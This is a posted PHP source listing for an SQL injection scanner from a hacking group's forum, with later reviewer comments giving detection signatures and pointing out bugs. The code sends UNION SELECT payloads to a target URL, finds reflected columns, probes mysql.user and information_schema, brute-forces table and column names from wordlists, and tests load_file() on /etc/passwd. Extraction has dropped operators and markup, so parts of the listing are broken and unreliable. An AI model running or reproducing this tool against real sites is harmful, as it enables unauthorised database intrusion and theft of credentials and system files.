[SOURCE][PHP] Sql InyeXion Scanner | Ksecurity-team


[SOURCE][PHP] Sql InyeXion Scanner



Demo: http://www.upperbasement.com/STMB/
PHP Code:
@set_time_limit(0);/*
F-Security - Sql InyeXion Scanner v1
Developed by Knet
Administrators - www.remoteexecution.org
Contact:
Keynet.security@Gmail.com [ Mail ]
Keynet.security@Hotmail.com [ Msn ]
*/
// Reviewer notes. The page extraction dropped this script's HTML markup and
// several operators, so parts of the listing are not valid PHP as shown.
// Purpose: a web form that appends UNION SELECT probes to a URL supplied in
// the POST field 'web' and searches each response for a marker string.
// set_time_limit(0) above removes the execution time limit for the run.
//
// Indicators for WAF rules and access-log review, all taken from the line below:
//  - the marker 'err0r' is sent hex-encoded by bin2hex(), i.e. 0x6572723072;
//  - every probe begins with one of the 16 $union_array prefixes: "-1" or "1",
//    an optional single quote, then UNION [ALL] SELECT with "+" or empty
//    inline SQL comments standing in for spaces;
//  - the FROM keyword is joined with "+", empty inline comments or %20.
//
// Input handling: every POST field is read without isset() or validation, and
// 'union' and 'from' are used directly as array indexes with no bounds check.
// $count_union_array and $count_from_array are count()+1, so they overstate
// the array sizes.
$web=$_POST['web'];$end=$_POST['end'];$scann=$_POST['scann'];$union=$_POST['union'];$max=$_POST['max'];$from_format=$_POST['from'];$MySqluser=$_POST['MySqluser'];$InforMationSchema=$_POST['InforMationSchema'];$TblBrt=$_POST['TblBrt'];$TblFormat=$_POST['TblFormat'];$ColBrt=$_POST['ColBrt'];$ColFormat=$_POST['ColFormat'];$LdFl=$_POST['LdFl'];$string='err0r';$union_array=array('-1+UNION+SELECT+','-1\'+UNION+SELECT+','-1+UNION+ALL+SELECT+','-1\'+UNION+ALL+SELECT+','-1/**/UNION/**/SELECT/**/','-1\'/**/UNION/**/SELECT/**/','-1/**/UNION/**/ALL/**/SELECT/**/','-1\'/**/UNION/**/ALL/**/SELECT/**/','1+UNION+SELECT+','1\'+UNION+SELECT+','1+UNION+ALL+SELECT+','1\'+UNION+ALL+SELECT+','1/**/UNION/**/SELECT/**/','1\'/**/UNION/**/SELECT/**/','1/**/UNION/**/ALL/**/SELECT/**/','1\'/**/UNION/**/ALL/**/SELECT/**/');$count_union_array=count($union_array) + 1;$from_array=array('+from+','/**/from/**/','+FROM+','/**/FROM/**/','%20from%20','%20FROM%20');$count_from_array=count($from_array) + 1;$from=$from_array[$from_format];$iny_1=$union_array[$union];$iny_2='0x'.bin2hex($string);$iny_3='0x'.bin2hex($string);
// Fallback column limit of 3 when 'max' is empty or not numeric.
// NOTE(review): "$max<||" has lost its right-hand operand in extraction,
// presumably a lower bound - confirm against an intact copy.
// No upper bound is visible in this check, so the number of requests per run
// follows whatever the POST field says.
if(
$max<|| $max=="" || !is_numeric($max))
{
$max=3;
}
?>

Sql InyeXion Scanner F-Security Team

Web:

// Echoes the submitted URL back, presumably into the value attribute of the
// "Web" input (the tag itself was lost in extraction). htmlentities() escapes
// double quotes, which suits the double-quoted attribute closed on this line.
if($web!=""){echo htmlentities($web);}else{echo 'http://www.site.com/news.php?id=';} ?>" size="60">
Union*:

// Emits one entry per UNION prefix, presumably as option tags (markup lost in
// extraction). The bound is count()+1 with "<=", so the loop reads two indexes
// past the end of the 16-element array; the != "" test skips those.
// The prefixes are static strings from this file and are echoed unescaped.
for($union_for=0;$union_for<=$count_union_array;$union_for++)
{
if(
$union_array[$union_for]!="")
{
echo 
'.$union_for.'">'.$union_array[$union_for].''."\n";
}
}
?>
Max columns:

// Emits the choices 1..255 for the maximum column count (markup lost in
// extraction). This cap exists only in the form: the visible server-side
// check on $max tests emptiness and is_numeric(), not an upper limit.
for($max_a=1;$max_a<=255;$max_a++)
{
echo 
'.$max_a.'">'.$max_a.''."\n";
}
?>
eND:

// Echoes the submitted 'end' suffix back through htmlentities(), defaulting to
// the SQL comment sequence "--" (the surrounding tag was lost in extraction).
if($end!=""){echo htmlentities($end);}else{echo '--';} ?>" size="10">

From* Format:

// Emits one entry per FROM separator, presumably as option tags (markup lost
// in extraction). As with the UNION list, the bound is count()+1 with "<=", so
// two indexes past the end of the 6-element array are read and then skipped
// by the != "" test.
for($from_for=0;$from_for<=$count_from_array;$from_for++)
{
if(
$from_array[$from_for]!="")
{
echo 
'.$from_for.'">'.$from_array[$from_for].''."\n";
}
}
?>

Test mysql.user: Yes No
Test information_schema: Yes No
Tables BruteForce: Yes No | tablename | TableName | TABLENAME
Columns BruteForce: Yes No | columname | ColumName | COLUMNAME
Test load_file(): Yes No


// Column-count probe, run when the form was submitted with a non-empty 'web'.
// For each count from 1 to $max the script fetches
// $web + UNION prefix + a growing comma-separated list of hex markers + $end
// and checks the response body for the plain marker 'err0r'.
// When the marker is reflected, it records which positions came back as
// 'err0r-N' in $vulns, prints a link to the probe URL, and defines the
// constant vuln that gates every follow-up test below.
//
// Defender view: a single client issuing up to $max sequential GETs in which
// one parameter grows by one 0x6572723072.. item per request is the pattern
// to alert on; the server running this script is the HTTP client.
//
// For anyone who finds this file on a host: $web is passed to
// file_get_contents() unvalidated, so the script fetches whatever URL or
// stream wrapper path the POST field names. Errors are hidden by "@".
// $iny_vuln and $_SESSION['all_saveds'] are appended to without being
// initialised, and no session_start() appears in the visible listing.
if(isset($scann) && $web!="")
{
for(
$a_for=1;$a_for<=$max;$a_for++)
{
// '2d' is the hex for "-", so each list item decodes to 'err0r-' followed by
// the column number.
// NOTE(review): "$webmas $iny;" and "$alert strpos(" have lost an operator in
// extraction, presumably "=" - confirm against an intact copy.
$iny_2=$iny_2.'2d'.bin2hex($a_for);$iny=$web.$iny_1.$iny_2;$webmas $iny;$contenido = @file_get_contents($webmas.$end);$alert strpos($contenido,$string);
if(!
$alert)
{
$iny_2=$iny_2.','.$iny_3;$iny_vuln .= $a_for.',';
}
else
{
$f_num=$a_for;$web_final=$web.$iny_1.$iny_vuln.$f_num;//echo $webmas;echo '[+] Bug Found in: '.$a_for."
"
.'.htmlentities($web_final.$end).'" TARGET=BLANK>'.htmlentities($web_final.$end).''."
"
;
echo 
'vuln in num/s: |';/*********************************SALVANDO***************************************/$_SESSION['all_saveds'] .= '[+] Bug Found in: '.$a_for."
"
.'.htmlentities($web_final.$end).'" TARGET=BLANK>'.htmlentities($web_final.$end).''."
"
.'vuln in num/s: |';/*********************************SALVANDO***************************************/$vulns=array();
for(
$search_for=1;$search_for<=$a_for;$search_for++)
{
if(
strpos($contenido,$string.'-'.$search_for))
{
echo 
$search_for.'|';/*********************************SALVANDO**********************
*****************/
$_SESSION['all_saveds'] .= $search_for.'|';/*********************************SALVANDO**********************
*****************/
array_push($vulns,$search_for);
}
}
/*********************************SALVANDO***************************************/$_SESSION['all_saveds'] .= "
"
.'---------------------------------------------'.'------------------------------------------------'."
"
;/*********************************SALVANDO***************************************/echo "
"
.'---------------------------------------------'.'------------------------------------------------'."
"
;$a_for=$max;define('vuln','yes');
}
if(!
$alert && $a_for==$max)
{
echo 
'no vuln in 1->'.$max."\n";
}
$contenido='';
}
}
// Follow-up test, run only when the constant vuln was defined by the scan
// above and the form sent MySqluser=S: repeats the last probe with the chosen
// FROM separator and "mysql.user" appended, then reports whether the marker
// is still reflected.
// Defender view: the hex marker together with "mysql.user" in a query string.
// An application database account with no SELECT privilege on the mysql
// schema makes this test come back negative.
// The bare constant vuln is undefined when the scan found nothing; PHP 8
// throws an Error for that, older versions fall back to the string 'vuln'.
/* FINAL SIMPLE SCANN */if(vuln=="yes" && isset($MySqluser) && $MySqluser=="S")
{
// NOTE(review): "$alert_mysql_user strpos(" has lost an operator in
// extraction, presumably "=" - confirm against an intact copy.
$from_mysql_user=$from.'mysql.user';$contenido = @file_get_contents($webmas.$from_mysql_user.$end);$alert_mysql_user strpos($contenido,$string);
if(
$alert_mysql_user)
{
echo 
'[+] MySQL Database Found:'.'
'
;
echo 
'.htmlentities($web_final.$from_mysql_user.$end).'" TARGET=BLANK>'.htmlentities($web_final.$from_mysql_user.$end).''."
"
;
echo 
'[+] Columns default in mysql.user: Host,User,Password'.'
'
;
}
else
{
echo 
'[+] MySQL Database not Found:'.'
'
;
}
echo 
'-------------------------------'."
"
;
}
// Follow-up test, run only when the constant vuln is defined and the form
// sent InforMationSchema=S: repeats the last probe with the chosen FROM
// separator and "information_schema.tables" appended, then reports whether
// the marker is still reflected and prints the default column names.
// Defender view: the hex marker together with "information_schema.tables" in
// a query string.
/* FINAL Mysql.user TEST */if(vuln=="yes" && isset($InforMationSchema) && $InforMationSchema=="S")
{
// NOTE(review): "$alert_information_schema strpos(" has lost an operator in
// extraction, presumably "=" - confirm against an intact copy.
$from_information_schema=$from.'information_schema.tables';$contenido = @file_get_contents($webmas.$from_information_schema.$end);$alert_information_schema strpos($contenido,$string);
if(
$alert_information_schema)
{
echo 
'[+] Information_Schema Database Found:'.'
'
;
echo 
'.htmlentities($web_final.$from_information_schema.$end).'" TARGET=BLANK>'.htmlentities($web_final.$from_information_schema.$end).''."
"
;
echo 
'[+] Columns default in information_schema.tables: TABLE_SCHEMA,TABLE_NAME'.'
'
;
echo 
'---------------'."
"
;
echo 
'[+] Columns default in information_schema.columns:
TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME'
.'
'
;
}
else
{
echo 
'[+] Information_Schema Database not Found:'.'
'
;
}
echo 
'-------------------------------'."
"
;
}
// Table and column name guessing, run only when the constant vuln is defined
// and the form sent TblBrt=S with a TblFormat value.
// Table pass: one request per non-empty wordlist line, appending the FROM
// separator and the candidate name to the last probe; a reflected marker is
// reported as "Table Found".
// Column pass (ColBrt=S, nested inside each table hit): one request per
// column wordlist line, with concat(0x6572723072,<candidate>) placed in every
// reflected position listed in $vulns and plain numbers elsewhere.
//
// Defender view: request volume is roughly table wordlist size plus, per
// table hit, the column wordlist size, all from one client and sequential;
// "concat(0x6572723072," in a query string is a stable signature.
// $cols_brt_string and $cols_vulns are appended to or compared before being
// initialised, and table names are echoed without htmlentities() (they come
// from the local wordlist, not from the request).
/* FINAL information_schema database */if(vuln=="yes" && isset($TblBrt) && $TblBrt=="S" && isset($TblFormat))
{
// The POST value only selects among three fixed local filenames, so it cannot
// steer file() to an arbitrary path.
switch(
$TblFormat)
{
case 
1:$file_txt_tables='1.txt';
break;
case 
2:$file_txt_tables='2.txt';
break;
case 
3:$file_txt_tables='3.txt';
break;
default:
$file_txt_tables='1.txt';
}
// A missing wordlist is not handled: "@" hides the file() failure and the
// result goes straight to count(). The "<=" bound below reads one index past
// the end; the != "" test skips it.
$file_tables=@file($file_txt_tables);$count_tables=count($file_tables);
for(
$t_for=0;$t_for<=$count_tables;$t_for++)
{
$file_tables[$t_for]=trim($file_tables[$t_for]);
if(
$file_tables[$t_for] != "")
{
// NOTE(review): "$alert_table strpos(" has lost an operator in extraction,
// presumably "=" - confirm against an intact copy.
$from_table=$from.$file_tables[$t_for];$contenido = @file_get_contents($webmas.$from_table.$end);$alert_table strpos($contenido,$string);
if(
$alert_table)
{
echo 
'[+] Table Found: '.$file_tables[$t_for]."
"
;
echo 
'.htmlentities($web_final.$from_table.$end).'" TARGET=BLANK>'.htmlentities($web_final.$from_table.$end).''."
"
;/*
echo 'webmas:'.$webmas.'
';
echo 'webfinal:'.$web_final.'
';
echo 'web:'.$web.'
';
*/
if(isset($ColBrt) && $ColBrt=="S" && isset($ColFormat))
{
/****************************************************************
*******/
switch($ColFormat)
{
case 
1:$file_txt_columns='1.txt';
break;
case 
2:$file_txt_columns='2.txt';
break;
case 
3:$file_txt_columns='3.txt';
break;
default:
$file_txt_columns='1.txt';
}
$file_columns=@file($file_txt_columns);$count_columns=count($file_columns);$count_vulns=count($vulns);$count_vulns $count_vulns 1;
for(
$c_for=0;$c_for<=$count_columns;$c_for++)
{
$file_columns[$c_for]=trim($file_columns[$c_for]);
if(
$file_columns[$c_for] != "")
{
for(
$cols_for=1;$cols_for<=$f_num;$cols_for++)
{
if(
in_array($cols_for,$vulns))
{
if(
$cols_for != $f_num)
{
$cols_brt_string .= 'concat(0x'.bin2hex($string).','.$file_columns[$c_for].'),';
}
else
{
$cols_brt_string .= 'concat(0x'.bin2hex($string).','.$file_columns[$c_for].')';
}
}
else
{
if(
$cols_for != $f_num)
{
$cols_brt_string .= $cols_for.',';
}
else
{
$cols_brt_string .= $cols_for;
}
}
}
$col_contenido=@file_get_contents($web.$iny_1.$cols_brt_string.$from_table.$end);$alert_col strpos($col_contenido,$string);
if(
$alert_col)
{
if(
$cols_vulns=="")
{
$cols_vulns =$file_columns[$c_for];
}
else
{
$cols_vulns .= ','.$file_columns[$c_for];
}
/*
$cols_brt_string=str_replace('concat(0x'.bin2hex($string).',','',
$cols_brt_string);
$cols_brt_string=str_replace(')','',
$cols_brt_string);
echo '[+] Column Found in '.
$file_tables[$t_for].
': '.$file_columns[$c_for].'
';
echo '
htmlentities($web.
$iny_1.$cols_brt_string.$from_table.$end).'" TARGET=BLANK>'.
htmlentities($web.
$iny_1.$cols_brt_string.$from_table.$end).''."
";
*/
}$cols_brt_string='';
}
/**/}
if(
$cols_vulns!="")
{
echo 
'[+] Column/s Found in '.$file_tables[$t_for].' : '.$cols_vulns.'
'
;$cols_vulns='';
}
/****************************************************************
*******/
}
echo 
'-------------------------------'."
"
;
}
}
}
}
// File-read test, run only when the constant vuln is defined and the form
// sent LdFl=S: builds one more UNION column list in which a reflected
// position carries a load_file() call on the hex-encoded path '/etc/passwd',
// fetches it, and reports ENABLED when the response contains 'root:x:'.
//
// Defender view: request side, "load_file(0x2f6574632f706173737764" in a
// query string; response side, a web response body containing 'root:x:'.
// On MySQL the call only returns data when the application account holds the
// FILE privilege and secure_file_priv permits the path, so withholding FILE
// from that account makes this test come back DISABLED.
/* FINAL TABLE AND COLUMNS BRUTEFORCE */if(vuln=="yes" && isset($LdFl) && $LdFl=="S")
{
// NOTE(review): "$string_alert_loadfile 'root:x:'" has lost an operator in
// extraction, presumably "=" - confirm against an intact copy.
$string_alert_loadfile 'root:x:';
// load_file is read as a bare constant before define() has run; PHP 8 throws
// an Error for an undefined constant, older versions use the string
// 'load_file'. $load_file_string is appended to without being initialised.
for(
$load_file_for=1;$load_file_for<=$f_num;$load_file_for++)
{
if(
in_array($load_file_for,$vulns) && load_file!="yes")
{
if(
$load_file_for != $f_num)
{
$load_file_string .= 'load_file(0x'.bin2hex('/etc/passwd').')'.',';
}
else
{
$load_file_string .= 'load_file('.$load_file_for.')';
}
define('load_file','yes');
}
else
{
if(
$load_file_for != $f_num)
{
$load_file_string .= $load_file_for.',';
}
else
{
$load_file_string .= $load_file_for;
}
}
}
// NOTE(review): "$alert_load_file strpos(" has lost an operator in
// extraction, presumably "=" - confirm against an intact copy.
$web_load=$web.$iny_1.$load_file_string.$end;$contenido_load = @file_get_contents($web_load);$alert_load_file strpos($contenido_load,$string_alert_loadfile);
echo 
'[+] load_file(): ';
if(
$alert_load_file)
{
echo 
'ENABLED'.'
'
;
echo 
'.htmlentities($web_load).'" TARGET=BLANK>'.htmlentities($web_load).''."
"
;
}
else
{
echo 
'DISABLED'.'
'
;
}
echo 
'-------------------------------'."
"
;
}
/* FINAL LOAD_FILE() TEST */?>



